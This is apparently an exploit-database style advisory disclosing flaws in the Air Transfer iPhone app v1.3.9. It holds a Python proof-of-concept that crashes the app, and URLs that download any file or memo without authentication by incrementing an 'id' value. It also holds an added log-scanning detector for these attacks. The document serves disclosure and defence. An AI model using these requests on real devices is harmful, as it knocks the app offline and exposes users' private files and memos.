Air Transfer iPhone 1.3.9 - Multiple Vulnerabilities
Source: @samanL33T  Author: Singh  Published: 2014-08-25
# Exploit Title: Air Transfer iPhone v1.3.9 - Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Author: Samandeep Singh (SaMaN - @samanL33T )
# Vendor Homepage: http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html
#   https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Timeline
=======================
[Aug. 19 2014]  Vendor Contacted
[Aug. 19 2014]  Vendor replied
[Aug. 19 2014]  Vendor informed about vulnerability with PoC (No reply received)
[Aug. 21 2014]  Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014]  Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad !
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !



Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

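#!/usr/bin/python
# Python 2 script (uses raw_input and the print statement)
import socket
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input("Enter IP : ")
port = 8080  # same port as the URLs in section 2

# Open a TCP connection to the app's HTTP listener
def connect():
    try:
        s.connect((str(host), port))
    except socket.error:
        print "Error: couldn't connect"
        sys.exit()
    return "connected to target"

# Crashing the App: getList request (note the second '?' in the query string)
def crashing():
    req = "GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
    try:
        s.sendall(req)
    except socket.error:
        print "Error occurred, Couldn't crash App"
        sys.exit()
    # No response is read back; this message only means the request was sent
    return "Application Down, Connection closed"

print connect()
print crashing()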
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file, simply visit:

http://<IP>:8080/?downloadSingle?id=1

By incrementing the value of "id" we can download all the files.

To view saved memos, visit the link below:

http://<IP>:8080/getText?id=0


We can read all the memos by incrementing the value of "id".



#SaMaN(@samanL33T)
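
A defender-side check for the two issues above, as an added example that is not part of the original advisory: it scans (client, request line) records, such as a proxy or capture of port 8080 would yield, for the getList request shape used in the PoC and for runs of consecutive "id" values on downloadSingle and getText. The sample records, the record format, the MIN_RUN threshold and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample records (client IP, HTTP request line); not real traffic.
SAMPLE_LOG = [
    ("192.0.2.10", "GET /getText?id=0 HTTP/1.1"),
    ("192.0.2.10", "GET /getText?id=1 HTTP/1.1"),
    ("192.0.2.10", "GET /getText?id=2 HTTP/1.1"),
    ("192.0.2.22", "GET /?downloadSingle?id=7 HTTP/1.1"),
    ("192.0.2.22", "GET /getList?category=categoryAll&pageNo=1&key= HTTP/1.1"),
    ("192.0.2.33", "GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1"),
    ("192.0.2.33", "this is not an HTTP request line"),
]
ID_REQUEST = re.compile(r"(downloadSingle|getText)\?id=(\d+)")
MIN_RUN = 3  # assumed threshold: consecutive ids before a client is flagged

def longest_run(ids):
    """Length of the longest run of consecutive integers in a set of ids."""
    best = 0
    for i in ids:
        if i - 1 not in ids:              # i is the start of a run
            n = 1
            while i + n in ids:
                n += 1
            best = max(best, n)
    return best

def analyse(records, min_run=MIN_RUN):
    """Return a sorted list of (client, finding) tuples."""
    seen = defaultdict(set)               # (client, endpoint) -> ids requested
    findings = set()
    for client, line in records:
        parts = line.split()
        if len(parts) != 3 or not parts[2].startswith("HTTP/"):
            continue                      # skip anything that is not a request line
        path, _, query = parts[1].partition("?")
        if path == "/getList" and "?" in query:
            findings.add((client, "malformed getList query"))
        m = ID_REQUEST.search(parts[1])
        if m:
            seen[(client, m.group(1))].add(int(m.group(2)))
    for (client, endpoint), ids in seen.items():
        if longest_run(ids) >= min_run:
            findings.add((client, "id enumeration on " + endpoint))
    return sorted(findings)

if __name__ == "__main__":
    for client, finding in analyse(SAMPLE_LOG):
        print(client, finding)
```
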























 